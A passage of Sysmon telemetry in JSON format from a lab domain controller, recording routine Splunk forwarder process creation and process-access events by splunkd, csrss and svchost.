MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:49:50.902","ProcessGuid":"{A837DB8D-027E-5F25-0000-001064EB0500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","FileVersion":"8.0.2","Description":"Active Directory monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-admon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:49:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3928,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:50.902\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-027E-5F25-0000-001064EB0500}\r\nTargetProcessId: 1540\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:50.902","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-027E-5F25-0000-001064EB0500}","TargetProcessId":"1540","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3929,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:50.902\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-027E-5F25-0000-001064EB0500}\r\nTargetProcessId: 1540\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:50.902","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-027E-5F25-0000-001064EB0500}","TargetProcessId":"1540","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:49:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3930,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:50.902\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:50.902","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3931,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:50.902\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:50.902","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3932,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:50.902\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:50.902","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3933,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:50.902\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:50.902","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3934,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:50.902\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:50.902","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3935,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:50.902\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 